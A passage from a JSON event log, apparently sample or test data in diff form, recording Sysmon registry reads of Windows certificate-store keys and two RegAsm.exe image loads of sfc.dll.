"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 